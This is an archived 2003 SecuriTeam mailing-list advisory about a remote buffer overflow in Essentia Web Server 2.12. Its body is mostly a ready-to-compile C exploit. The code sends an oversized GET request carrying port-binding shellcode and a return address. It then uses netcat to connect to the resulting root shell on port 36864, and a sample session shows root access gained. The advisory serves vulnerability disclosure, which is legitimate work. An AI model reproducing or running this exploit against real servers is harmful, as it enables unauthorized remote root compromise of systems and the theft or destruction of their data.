[EXPL] Essentia Web Server Exploit Code Released

• Previous message: SecuriTeam: "[NEWS] cPanel Malicious HTML Tags Injection Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 6 Jul 2003 18:41:24 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security in Canada

Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.

Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

- - - - - - - - -

  Essentia Web Server Exploit Code Released
------------------------------------------------------------------------

SUMMARY

The Essentia Web Server provides Enhanced Web Application and
Communication Services. A security vulnerability in the product allows
attackers to cause the server to crash while executing arbitrary code. The
following exploit code can be used to test the system for the mentioned
vulnerability.

DETAILS

Vulnerable systems:
 * Essentia Web Server version 2.12

Exploit:
/*

  Title: Remote Buffer Overflow in Essentia Webserver.
  Author: By B-r00t <br00t@blueyonder.co.uk>

  Date: 04/07/2003
  Reference: http://www.essencomp.com/
  Versions: Essentia Web Server 2.12 (Linux) => VULNERABLE
  Related Info: http://www.securityfocus.com/bid/4159/info/

  Exploit: essenexploit.c
  Compile: gcc -o essenexploit essenexploit.c
      Exploit binds a r00tshell to port 36864.
      Tested on Redhat 7.2 & 7.1
      THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!

$ telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 04 Jul 2003 11:19:39 GMT
Server: Essentia Web Server 2.12 (Linux)
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 757
ETag: "f104b5-5f2-0b7940f3"
Last-Modified: Thu, 03 Jul 2003 20:53:04 GMT

Connection closed by foreign host.

$ ./essenexploit 127.0.0.1
essenexploit by B-r00t <br00t@blueyonder.co.uk>. (c) 2003

Number of bytes sent: 2057 / 2057

Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!
localhost.localdomain [127.0.0.1] 36864 (?) open
uname -a; id;
Linux RedHat7-2 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

ENJOY!
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "essenexploit"
#define DEST_PORT 80
#define NOP "A"

int main ( int argc, char *argv[] )
{

// Vars
int socketfd, loop, bytes;
struct sockaddr_in dest_addr;
char *TARGET = "TARGET";
char buf[2100], *ptr;
// Big fat slide NOP so ret should be good everywhere!
char ret[] = "\xe8\xc5\xff\xbe\xe8\xc5\xff\xbe";
char shellcode[] =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";

printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. (c) 2003\n", EXPLOIT);

if (argc < 2)
{
        printf ("\nUsage: %s [IP_ADDRESS]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 \n", EXPLOIT);
        printf ("\nOn success a r00tshell will be spawned on port
36864.\n\n");
        exit (-1);
}

setenv (TARGET, argv[1], 1);

// Build buf
memset (buf, '\0', sizeof (buf));
ptr = buf;
strcat (buf, "GET /");

for (loop = 1; loop < 2033-sizeof(shellcode); loop++)
strcat (buf, NOP);

strcat (buf, shellcode);
strcat (buf, ret);
strcat (buf, " HTTP/1.0");
strcat (buf, "\x0D\x0A\x0D\x0A");

// Socket
if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("\nsocket error\n");
        exit (1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {
        perror("inet_aton problems");
        exit (2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);

if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct
sockaddr)) == -1){
        perror("\nconnect failed\n");
        close (socketfd);
        exit (3);
        }

// Wallop!
bytes = (send (socketfd, ptr, strlen(buf), 0));
if (bytes == -1) {
        perror("\nsend error\n");
        close (socketfd);
        exit(4);
        }
close (socketfd);
if (bytes < strlen(buf))
printf ("\nNetwork Error - Full Payload Was NOT sent!");

printf ("\n\nNumber of bytes sent: %d / %d\n", bytes, strlen(buf));
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ...!\n");
sleep (3);
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
} // end main

/*

Shoutz: Marshal-l, Rux0r, blunt, macavity, Monkfish
  Rewd, Maz. That One Doris ... U-Know-Who-U-R!
  The doris.scriptkiddie.net posse.

Author: B-r00t aka B#. 2003. <br00t@blueyonder.co.uk> (c)
  "If You Can't B-r00t Then Just B#."

  ENJOY!
*/

ADDITIONAL INFORMATION

The information has been provided by <mailto:br00t@blueyonder.co.uk>
B-r00t.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] cPanel Malicious HTML Tags Injection Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [NT] Essentia Web Server DoS Vulnerability ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Essentia Web Server provides Enhanced Web ... product allows attackers to cause the server to crash effectively causing ... Essentia Web Server DoS Vulnerability ... (Securiteam) SecurityOffice Security Advisory:// Essentia Web Server Vulnerabilities (Vendor Patch) ... Thank you for evaluating the trial version of Essentia Web Server. ... The Security problems pointed by you as well as some minor updates ... Do you have 128-bit SSL encryption server security? ... Get VeriSign's FREE Guide, "Securing Your Web Site for Business," and learn ... (NT-Bugtraq) SecurityOffice Security Advisory:// Essentia Web Server Directory Traversal Vulnerability ... Essentia Web Server Directory Traversal Vulnerability ... Go Beyond PARTIAL Security: FREE White Paper ... FREE White Paper shows you how to ensure TOTAL security for your Internet ... (NT-Bugtraq) SecurityOffice Security Advisory:// Essentia Web Server DoS Vulnerability ... Essentia Web Server DoS Vulnerability ... Communication Services. ... Go Beyond PARTIAL Security: FREE White Paper ... perimeter with the most current and most complete PROACTIVE Vulnerability ... (NT-Bugtraq)